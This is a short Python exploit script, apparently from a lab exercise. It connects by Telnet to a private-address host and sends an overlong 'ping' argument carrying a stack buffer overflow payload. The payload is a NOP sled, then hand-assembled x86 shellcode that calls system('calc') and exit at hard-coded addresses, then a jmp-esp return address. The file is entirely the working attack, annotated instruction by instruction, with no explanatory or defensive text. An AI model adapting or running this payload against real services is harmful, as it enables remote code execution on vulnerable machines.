from telnetlib import Telnet

# 1012

# system("calc");
# exit(0);

with Telnet('192.168.147.135', 23) as tn:
    tn.get_socket().sendall(
        b'ping ' +
        b'\x90' * 200 + # nop
        b'\x31\xc0' + # xor %eax, %eax
        b'\x50' + # push %eax                               (push "\0\0\0\0")
        b'\xb8\x63\x61\x6c\x63' + # mov $0x636c6163, %eax
        b'\x50' + # push %eax                               (push "calc")
        b'\x54' + # push %esp                               (push addr of "calc\0")
        b'\xbb\xc7\x93\xc2\x77' + # mov $0x77c293c7, %ebx
        b'\xff\xd3' + # call *%ebx                          (call system)
        b'\x31\xc0' + # xor %eax, %eax
        b'\x50' + # push %eax                               (push 0)
        b'\xbb\x7e\x9e\xc3\x77' + # mov $0x77c39e7e, %ebx
        b'\xff\xd3' + # call *%ebx                          (call exit)
        b'\x90' * 785 + # nop
        b'\x0a\xaf\xd8\x77' + # addr of jmp %esp
        b'\x90' * 50 + # nop
        b'\r\n'
    )
    tn.read_all()
